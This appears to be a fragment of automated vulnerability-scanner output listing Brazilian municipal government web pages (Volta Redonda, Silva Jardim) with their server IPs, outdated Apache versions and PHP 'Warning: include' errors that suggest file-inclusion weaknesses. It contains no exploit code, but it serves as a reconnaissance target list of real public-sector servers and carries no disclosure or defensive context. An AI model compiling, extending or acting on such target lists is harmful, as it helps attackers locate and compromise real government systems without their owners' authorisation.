/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[157] - http://www.voltaredonda.rj.gov.br/destaque/campanha_abraco.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[158] - www.voltaredonda.rj.gov.br/destaque/campanha_abraco.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[159] - http://www.vr.rj.gov.br/destaque/ballet.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[160] - www.vr.rj.gov.br/destaque/ballet.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[161] - http://www.silvajardim.rj.gov.br/old2012/index.php?option=com_content&view=article&id=1380:poetas-locais-participam-de-recital-de-poesias-em-homenagem-aos-172-anos-de-silva-jardim&catid=32:turismo&Itemid=47
/ HTTP_CODE: 200  / IP SERVER: 201.18.231.38  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.16 (Debian)
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[162] - www.silvajardim.rj.gov.br/.../index.php?...
/ HTTP_CODE: 302  / IP SERVER: 201.18.231.38  / PORTA SERVER: 80  / WEB SERVER: